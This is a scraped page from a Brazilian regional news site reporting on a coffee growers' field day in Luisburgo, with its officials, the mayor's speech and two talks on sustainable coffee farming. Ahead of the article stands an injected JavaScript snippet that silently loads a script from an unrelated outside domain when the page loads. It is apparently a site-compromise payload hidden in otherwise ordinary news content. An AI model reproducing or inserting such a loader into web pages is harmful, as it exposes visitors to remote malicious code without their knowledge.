;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Dia de Campo reúne produtores em Luisburgo. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Dia de Campo reúne produtores em Luisburgo.

Recentemente inserido no Projeto Café das Matas de Minas, o município de Luisburgo realizou um Dia de Campo especial, reunindo grandiosa participação de cafeicultores no ginásio poliesportivo. Para a consolidação deste evento integrante do Projeto Café das Matas de Minas, houve total apoio da Prefeitura, do SEBRAE e do SICOOB, além de demais parceiros na região.
A Mesa Diretora do evento foi composta por Prefeito José Carlos Pereira; Vice-prefeito Geraldo Rhodes; Presidente da Câmara, Geraldo Aparecido da Silva; Coordenadora Técnica do SEBRAE, Ereni Emerick; Diretor Adm. do SICOOB, Sebastião de Lourdes Lopes; Coordenador Regional da EMATER, Paulo Roberto Vieira Correa, e extensionista Giovani Vidigal Araújo; Presidente do Sind. dos Trabalhadores Rurais de Luisburgo, Silvana Damasceno, e Comandante da Polícia Militar de Meio Ambiente/ Manhuaçu, Sgt. Rildo. Também prestigiaram o encontro o Vice-pres. da Câmara, Lourival Rodrigues Rosa; Vereadores Eduardo de Freitas (1º Sec.), Maria de Fátima, Jésio Damasceno, Luis Rodrigues Rosa, Adriana Garcia e José Aparecido; Sgt. Edgar (PM/ Meio Ambiente), Supervisora de Planejamento do Sicoob e Membro da Comissão Técnica do Proj. Café das Matas de Minas, Isis de Castro Amaral Faria, e Gerente do SICOOB/ Luisburgo, Fábio Ventura.
Ao se pronunciar, o Prefeito José Carlos Pereira reafirmou o compromisso da Administração Municipal com as famílias rurais, por meio da melhoria constante da produção agrícola, principalmente a cafeicultura. José Carlos lembrou ainda a recente adesão de Luisburgo ao Projeto Café das Matas de Minas com a proposta de trazer novos conhecimentos aos produtores, e, a partir daí, haver maior produtividade com redução de custos nos processos de produção e de comercialização, cuidados com o meio ambiente e a saúde humana, entre outros fatores. “Sabemos dos sacrifícios de quem trabalha com o café, carregando peso e correndo riscos pelas proximidades com bichos diversos e animais peçonhentos. Conheço esta realidade de perto, e, em nossa trajetória de trabalho, na Câmara Municipal, no Sindicato dos Trabalhadores Rurais, e, agora, na Prefeitura, sempre tivemos esta preocupação: a de melhorar a vida de quem mora no campo”, ressaltou o Prefeito.
Palestras
Os participantes acompanharam duas palestras. A primeira foi ministrada por Dr. José Luiz Rufino, tendo como tema: “A Importância da Cafeicultura das Matas de Minas e Luisburgo”. Em seguida, o Consultor Técnico da Experimental Agrícola do Brasil (Illy Café), Sérgio D´Alessandro, abordou o tema: “Agricultura Sustentável na Produção de Cafés de Qualidade”.
O público acompanhou as explanações atentamente e fizeram perguntas e considerações sobre os temas apresentados, em uma positiva troca de conhecimentos.


Informação e fotos: (Assessoria de Imprensa)

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.